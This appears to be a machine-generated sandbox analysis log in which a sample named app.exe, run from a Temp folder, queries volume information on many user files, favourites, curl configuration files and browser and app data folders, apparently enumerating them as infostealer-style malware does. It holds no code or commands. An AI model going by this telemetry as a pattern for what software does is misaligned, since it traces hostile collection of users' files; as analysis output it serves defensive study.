Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Amazon.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Facebook.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Google.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Live.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\NYTimes.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Wikipedia.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Brighten Video.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Brighten Video.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\BRIGHT~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\BRIGHT~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Darken Video.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Darken Video.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\DARKEN~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\DARKEN~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Enhance Video Colors.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Enhance Video Colors.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\ENHANC~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\ENHANC~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Desktop.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Desktop.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Downloads.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\Acrobat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\ARM VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\Color VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms\Unistore VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\3534848bb9f4cb71 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\cb00da9ba77862e VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\CrashReports VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\Software Reporter Tool VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Intel\CUIPromotions VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Intel\Games VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\EdgeBho VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Feeds VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\GameDVR VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\InputPersonalization VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Internet Explorer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\OneDrive VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\PlayReady VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\XboxLive VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\ActiveSync VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\AppUp.IntelGraphicsExperience_8j3eq9eme6ctt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.1_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.6_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.UI.Xaml.2.7_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy VolumeInformation
